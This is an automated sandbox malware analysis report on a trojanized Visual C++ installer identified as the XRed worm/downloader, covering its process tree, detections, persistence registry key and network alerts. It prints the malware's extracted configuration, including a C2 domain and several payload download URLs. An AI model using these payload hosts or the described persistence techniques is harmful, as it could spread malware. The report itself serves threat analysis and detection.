Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1583478
MD5:	7274b0b15c4e6d5bbe8db5aa93c65a12
SHA1:	643418b70ee7242fb4cf797e54ec78c910d32824
SHA256:	70c87af178a804f97a312d3d8d509d5c6f4a54ac07d08bacf858e6687de7e435
Tags:	exeuser-jstrosch
Infos:

Detection

XRed

Score:	74
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected XRed

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Document contains an embedded VBA macro with suspicious strings

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Document contains an embedded VBA with functions possibly related to HTTP operations

Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)

Drops PE files to the document folder of the user

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

Uses dynamic DNS services

Checks for available system drives (often done to infect USB drives)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates or modifies windows services

Deletes files inside the Windows folder

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain (date check)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May infect USB drives

May sleep (evasive loops) to hinder dynamic analysis

Modifies existing windows services

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

PE file does not import any functions

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

System is w10x64

file.exe (PID: 4992 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7274B0B15C4E6D5BBE8DB5AA93C65A12)

._cache_file.exe (PID: 3960 cmdline: "C:\Users\user\Desktop\._cache_file.exe" MD5: DE34B1C517E0463602624BBC8294C08D)

._cache_file.exe (PID: 5272 cmdline: "C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe" -burn.clean.room="C:\Users\user\Desktop\._cache_file.exe" -burn.filehandle.attached=644 -burn.filehandle.self=652 MD5: 2F9D2B6CE54F9095695B53D1AA217C7B)

VC_redist.x86.exe (PID: 3088 cmdline: "C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe" -q -burn.elevated BurnPipe.{C5083B7D-B45A-4E12-82C2-69D6A2D5E9AA} {2D07A715-CF60-42B0-9715-B6AF208420A8} 5272 MD5: 2F9D2B6CE54F9095695B53D1AA217C7B)

Synaptics.exe (PID: 6464 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: B753207B14C635F29B2ABF64F603570A)

EXCEL.EXE (PID: 5140 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)

splwow64.exe (PID: 8072 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)

Synaptics.exe (PID: 1408 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: B753207B14C635F29B2ABF64F603570A)

SrTasks.exe (PID: 7232 cmdline: C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:1 MD5: 2694D2D28C368B921686FE567BD319EB)

conhost.exe (PID: 7252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 7332 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

VC_redist.x86.exe (PID: 7512 cmdline: "C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe" /burn.runonce MD5: 2F9D2B6CE54F9095695B53D1AA217C7B)

VC_redist.x86.exe (PID: 7532 cmdline: "C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe" MD5: 2F9D2B6CE54F9095695B53D1AA217C7B)

VC_redist.x86.exe (PID: 7552 cmdline: "C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe" -burn.clean.room="C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe" -burn.filehandle.attached=532 -burn.filehandle.self=540 MD5: 2F9D2B6CE54F9095695B53D1AA217C7B)

cleanup

Malware Configuration

Threatname: XRed

{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
file.exe	JoeSecurity_XRed	Yara detected XRed	Joe Security
file.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\Documents\~$cache1	JoeSecurity_XRed	Yara detected XRed	Joe Security
C:\Users\user\Documents\~$cache1	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
C:\ProgramData\Synaptics\RCXD314.tmp	JoeSecurity_XRed	Yara detected XRed	Joe Security
C:\ProgramData\Synaptics\RCXD314.tmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
C:\ProgramData\Synaptics\Synaptics.exe	JoeSecurity_XRed	Yara detected XRed	Joe Security
C:\ProgramData\Synaptics\Synaptics.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author
00000004.00000003.2242519374.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XRed	Yara detected XRed	Joe Security
00000000.00000000.2134817121.0000000000401000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_XRed	Yara detected XRed	Joe Security
00000000.00000000.2134817121.0000000000401000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Process Memory Space: file.exe PID: 4992	JoeSecurity_XRed	Yara detected XRed	Joe Security
Process Memory Space: Synaptics.exe PID: 6464	JoeSecurity_XRed	Yara detected XRed	Joe Security

Sigma Signatures

System Summary

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 4992, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 6464, TargetFilename: C:\Users\user\AppData\Local\Temp\s7GdySVm.xlsm

Suricata Signatures

ET MALWARE Snake Keylogger Payload Request (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T20:42:47.971516+0100	2044887	1	A Network Trojan was detected	192.168.2.6	49998	142.250.186.78	443	TCP

ETPRO MALWARE W32.Bloat-A Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T20:41:48.778198+0100	2832617	1	Malware Command and Control Activity Detected	192.168.2.6	49755	69.42.215.252	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe	Avira: detected
Source: file.exe	Avira: detected

Antivirus detection for URL or domain

Source: http://xred.site50.net/syn/SUpdate.ini0	Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/Synaptics.rarZ	Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/Synaptics.rard	Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/SSLLibrary.dll6	Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/SUpdate.iniZ	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\Documents\~$cache1	Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\Users\user\Documents\~$cache1	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\ProgramData\Synaptics\Synaptics.exe	Avira: detection malicious, Label: WORM/Delphi.Gen
Source: C:\ProgramData\Synaptics\Synaptics.exe	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\ProgramData\Synaptics\RCXD314.tmp	Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\RCXD314.tmp	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006

Found malware configuration

Source: file.exe

Malware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\Synaptics\RCXD314.tmp	ReversingLabs: Detection: 91%
Source: C:\ProgramData\Synaptics\Synaptics.exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\Documents\~$cache1	ReversingLabs: Detection: 91%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 86%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.8% probability

Machine Learning detection for dropped file

Source: C:\Users\user\Documents\~$cache1	Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\Synaptics.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\RCXD314.tmp	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_007D9EB7 DecryptFileW,	2_2_007D9EB7
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_007FF961 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,	2_2_007FF961
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 2_2_007D9C99 DecryptFileW,DecryptFileW,	2_2_007D9C99
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E59EB7 DecryptFileW,	3_2_00E59EB7
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E7F961 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,	3_2_00E7F961
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Code function: 3_2_00E59C99 DecryptFileW,DecryptFileW,	3_2_00E59C99
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C4F961 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,	8_2_00C4F961
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C29C99 DecryptFileW,DecryptFileW,	8_2_00C29C99
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Code function: 8_2_00C29EB7 DecryptFileW,	8_2_00C29EB7
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_0074F961 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,	18_2_0074F961
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_00729C99 DecryptFileW,DecryptFileW,	18_2_00729C99
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Code function: 18_2_00729EB7 DecryptFileW,	18_2_00729EB7

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe

Window detected: MICROSOFT SOFTWARE LICENSE TERMSMICROSOFT VISUAL C++ 2019 RUNTIME These license terms are an agreement between Microsoft Corporation (or based on where you live one of its affiliates) and you. They apply to the software named above. The terms also apply to any Microsoft services or updates for the software except to the extent those have different terms.IF YOU COMPLY WITH THESE LICENSE TERMS YOU HAVE THE RIGHTS BELOW.INSTALLATION AND USE RIGHTS. You may install and use any number of copies of the software.TERMS FOR SPECIFIC COMPONENTS.Microsoft Platforms. The software may include components from Microsoft Windows; Microsoft Windows Server; Microsoft SQL Server; Microsoft Exchange; Microsoft Office; and Microsoft SharePoint. These components are governed by separate agreements and their own product support policies as described in the Microsoft Licenses folder accompanying the software except that if license terms for those components are also included in the associated installation directory those license terms control.Third Party Components. The software may include third party components with separate legal notices or governed by other agreements as may be described in the ThirdPartyNotices file(s) accompanying the software. SCOPE OF LICENSE. The software is licensed not sold. This agreement only gives you some rights to use the software. Microsoft reserves all other rights. Unless applicable law gives you more rights despite this limitation you may use the software only as expressly permitted in this agreement. In doing so you must comply with any technical limitations in the software that only allow you to use it in certain ways. You may notwork around any technical limitations in the software;reverse user decompile or disassemble the software or otherwise attempt to derive the source code for the software except and only to the extent required by third party licensing terms governing the use of certain open source components that may be included in the software;remove minimize block or modify any notices of Microsoft or its suppliers in the software; use the software in any way that is against the law; orshare publish rent or lease the software or provide the software as a stand-alone offering for others to use or transfer the software or this agreement to any third party.EXPORT RESTRICTIONS. You must comply with all domestic and international export laws and regulations that apply to the software which include restrictions on destinations end users and end use. For further information on export restrictions visit www.microsoft.com/exporting <http://www.microsoft.com/exporting>. SUPPORT SERVICES. Because this software is as is we may not provide support services for it.ENTIRE AGREEMENT. This agreement and the terms for supplements updates Internet-based services and support services that you use are the entire agreement for the software and support services.APPLICABLE LAW. If you acquired the software in the United States Washing

Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore SRInitDone

Jump to behavior

Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1028\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1029\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1031\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1036\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1040\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1041\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1042\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1045\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1046\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1049\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1055\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\2052\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\3082\license.rtf	Jump to behavior
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	File created: C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\license.rtf
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	File created: C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1028\license.rtf
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	File created: C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1029\license.rtf
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	File created: C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1031\license.rtf
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	File created: C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1036\license.rtf
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	File created: C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1040\license.rtf
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	File created: C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1041\license.rtf
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	File created: C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1042\license.rtf
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	File created: C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1045\license.rtf
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	File created: C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1046\license.rtf
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	File created: C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1049\license.rtf
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	File created: C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1055\license.rtf
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	File created: C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\2052\license.rtf
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	File created: C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\3082\license.rtf

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.6:49998 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.6:49999 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.6:50000 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.6:50004 version: TLS 1.2

Source:	Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: file.exe, ._cache_file.exe.0.dr, VC_redist.x86.exe.8.dr, VC_redist.x86.exe.3.dr, ._cache_file.exe.2.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\vcamp140.i386.pdb source: vcamp140.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\MFC140CHS.i386.pdb source: mfc140chs.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: vcruntime140.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\vcomp140.i386.pdb source: vcomp140.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\mfc140u.i386.pdb source: mfc140u.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\msvcp140_2.i386.pdbGCTL source: msvcp140_2.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\MFC140JPN.i386.pdb source: mfc140jpn.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\msvcp140_codecvt_ids.i386.pdb source: msvcp140_codecvt_ids.dll.16.dr
Source:	Binary string: C:\agent\_work\8\s\build\ship\x86\WixStdBA.pdb source: ._cache_file.exe, 00000003.00000002.4001493943.000000006CD6F000.00000002.00000001.01000000.00000008.sdmp, VC_redist.x86.exe, 00000014.00000002.4001098826.0000000062E6F000.00000002.00000001.01000000.00000012.sdmp, wixstdba.dll.20.dr, wixstdba.dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\MFC140CHT.i386.pdb source: mfc140cht.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\vcomp140.i386.pdbGCTL source: vcomp140.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\MFCM140.i386.pdb source: mfcm140.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\vcamp140.i386.pdbGCTL source: vcamp140.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\MFC140ITA.i386.pdb source: mfc140ita.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\MFC140ESN.i386.pdb source: mfc140esn.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\MFC140ENU.i386.pdb source: mfc140enu.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: msvcp140.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\msvcp140_2.i386.pdb source: msvcp140_2.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\mfc140.i386.pdb source: mfc140.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\vccorlib140.i386.pdbGCTL source: vccorlib140.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\vccorlib140.i386.pdb source: vccorlib140.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\MFCM140U.i386.pdb source: mfcm140u.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\msvcp140_codecvt_ids.i386.pdbGCTL source: msvcp140_codecvt_ids.dll.16.dr
Source:	Binary string: d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\mfc140.i386.pdbGCTL source: mfc140.dll.16.dr
Source:	Binary string: C:\agent\_work\8\s\build\ship\x86\WixDepCA.pdb source: 452cb9.msi.16.dr, 452cb2.msi.16.dr

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\System32\msiexec.exe	System file written: C:\Windows\SysWOW64\mfcm140u.dll
Source: C:\Windows\System32\msiexec.exe	System file written: C:\Windows\SysWOW64\mfc140.dll
Source: C:\Windows\System32\msiexec.exe	System file written: C:\Windows\SysWOW64\mfc140u.dll
Source: C:\Windows\System32\msiexec.exe	System file written: C:\Windows\SysWOW64\vcomp140.dll
